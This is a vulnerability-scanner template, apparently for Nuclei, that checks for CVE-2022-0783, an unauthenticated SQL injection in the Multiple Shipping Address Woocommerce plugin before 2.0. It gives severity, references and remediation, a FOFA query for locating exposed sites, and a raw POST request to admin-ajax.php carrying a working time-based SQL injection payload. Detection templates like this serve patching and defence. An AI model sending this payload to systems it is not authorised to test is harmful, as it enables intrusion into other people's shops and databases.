The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
PoC代码[已公开]
id: CVE-2022-0783
info:
name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
remediation: |
Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
reference:
- https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0783
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.6
cve-id: CVE-2022-0783
cwe-id: CWE-89
epss-score: 0.37807
epss-percentile: 0.97111
cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: themehigh
product: multiple_shipping_addresses_for_woocommerce
fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)
matchers:
- type: dsl
dsl:
- "duration>=7"
- "len(body) == 5"
- "status_code==200"
- "regex('false$', body)"
condition: and
# digest: 4a0a00473045022047b0963d0785392958b27ac902d5f174bc997f33bd487074e3d4461c53dd96bc022100c130abf10b42cd20870c126144d34962ce4c0223c3e2590a3055498a9eb8e1e7:922c64590222798bb761d5b6d8e72950